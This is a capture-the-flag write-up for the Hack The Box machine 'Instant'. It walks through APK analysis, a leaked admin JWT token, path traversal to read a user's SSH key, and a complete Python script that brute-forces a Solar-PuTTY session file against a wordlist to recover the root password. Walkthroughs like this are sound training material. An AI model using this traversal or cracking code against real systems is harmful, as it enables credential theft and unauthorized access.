Instant (HTB)
I said NOW.
Intro.
Hi fellos today we have yet another HTB season machines let's get right into it.
Enumeration.
Port scan.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMM6fK04LJ4jNNL950Ft7YHPO9NKONYVCbau/+tQKoy3u7J9d8xw2sJaajQGLqTvyWMolbN3fKzp7t/s/ZMiZNo=
| 256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL+zjgyGvnf4lMAlvdgVHlwHd+/U4NcThn1bx5/4DZYY
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.58
|_http-title: Instant Wallet
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.58 (Ubuntu)
So classic we have HTTP and SSH.
Let's enum HTTP.
So after long time of enumeration including fuzzing, subdomain enum, directory search it turns out it was way simpler. So first thing come to my mind when i visit the website is to download the file i download it, it was .apk file.
then i though that the main object was there so i decopress the files.

at first glance i though nothing is in here is just a rabbit whole so i came back to the website and i did all the enumeration and no good. https://forum.hackthebox.com/t/official-instant-discussion/327960 then i navigate to the offial discussion and i saw one of the people says search more in the apk file so that's what i did and i find what i was looking for.

two subdomains exist under res/xml/network_security_config.xml.
So after some time testing with diffrent username password trying to get access to the admin enpoints.

so i though that in the code they must maybe have some creds to be able to access these endpoints so i start search for creds but i did not find 🤡. But what have i found ??.
Path traversal
```
eyJhbGciOiJIUzI1NiIsInR5c.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA
```
Was a bearer token which is jwt web token.
so i though it maybe expired but i tried it anyway.


So after i got the admin token i start looking around and the most intresting things was the logs and the users. the users only contain users sure. But the logs contains logs file regarding the endpoints.

Let's first see the avaliable logs and then tried to read them.

So we can see the file name and the path that files exist in, So let's read it.

The most importan thing in this image is that it uses query parameters to get the file name could it be LFI or Path traversal ???.
Emphasizing the Difference between LFI and Path Traversal
Local File Inclusion (LFI) occurs when an application improperly handles user input for file inclusion. Typically, this happens when an application accepts a file path from the user to include or display within a webpage, but does not properly restrict or validate the path. In this scenario, attackers can specify any file path on the server, causing the application to load and sometimes execute files from anywhere on the system. In PHP, for example, functions like include
and require
are often at risk if used insecurely.
Path Traversal, also known as Directory Traversal, is similar to LFI but has a different focus. Here, instead of including files into the application, the attacker tries to directly access restricted files by manipulating the file path. By using traversal sequences (like ../
), attackers can navigate to directories outside the intended file path and access sensitive files that weren’t meant to be exposed
So i tried both and the one that it works was the path traversal.


shell as shirohige.

So with all thing information we could access her ssh key.

And the pain was in cleaning this ssh key but we did it.


Shell as Root.
So from there i just did some basic enumeration and i found solar-putty session file in the opt directory.

And a bit more search i found that this could be crackable. thanks to https://xtromera.github.io/
I was able to crack it using the following python code.
import base64
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
def decrypt(passphrase, ciphertext):
try:
# Decode the base64 encoded ciphertext
array = base64.b64decode(ciphertext)
salt = array[:24]
iv = array[24:32]
encrypted_data = array[48:]
# Derive the key from the passphrase using PBKDF2
kdf = PBKDF2HMAC(
algorithm=hashes.SHA1(),
length=24, # Triple DES key size
salt=salt,
iterations=1000,
backend=default_backend()
)
key = kdf.derive(passphrase.encode())
# Create the cipher and decrypt the data
cipher = Cipher(algorithms.TripleDES(key), modes.CBC(iv), backend=default_backend())
decryptor = cipher.decryptor()
decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()
data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
return data
except Exception as e:
print(f'Error: {e}')
with open('./sessions-backup.dat') as f:
cipher = f.read()
with open('../../Downloads/rockyou.txt') as passwords:
for i, password in enumerate(passwords):
password = password.strip()
decrypted = decrypt(password, cipher)
print(f'[{i}] {password=}', end='\r')
if 'Credentials' in decrypted:
print('\r', i, password)
print()
print(decrypted)
break

and it turns out that it give us the root password now we just need to login as root.

Ending.
at this end this machine was one of the best machines that i ever played due to the ideas that it had from the inital access to the root eveything is new. Great work from HTB actully.
Last updated